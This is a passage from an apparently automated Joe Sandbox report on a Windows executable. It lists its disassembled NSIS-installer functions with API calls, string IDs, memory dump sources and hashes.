                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                    • String ID: @%F$N$open
                                                                                                                                    • API String ID: 3928313111-3849437375
                                                                                                                                    • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                    • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                                                    • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                    • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                                                    Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                    • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                    • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                    • API String ID: 565278875-1653569448
                                                                                                                                    • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                                                    • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                                                    • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                                                    • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                    • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                    • String ID: F
                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                    • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                    • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                                                    • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                    • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                                                    Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                    • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                    Strings
                                                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                    • API String ID: 1641139501-220328614
                                                                                                                                    • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                    • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                                                    • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                    • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                                                    Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                    Strings
                                                                                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                    • String ID: created uninstaller: %d, "%s"
                                                                                                                                    • API String ID: 3294113728-3145124454
                                                                                                                                    • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                    • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                                                    • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                    • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                                                    Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                    • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                    • API String ID: 3734993849-2769509956
                                                                                                                                    • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                    • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                                                    • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                    • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                                                    Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                    • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                    • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                    • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                                                    • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                    • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                                                    Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                    Strings
                                                                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                                                    • API String ID: 1033533793-945480824
                                                                                                                                    • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                    • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                                                    • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                    • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                                                    Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                      • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                      • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                    Strings
                                                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                                                    • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                    • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                                                    • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                    • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                                                    Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                    • GetMessagePos.USER32 ref: 00404871
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404889
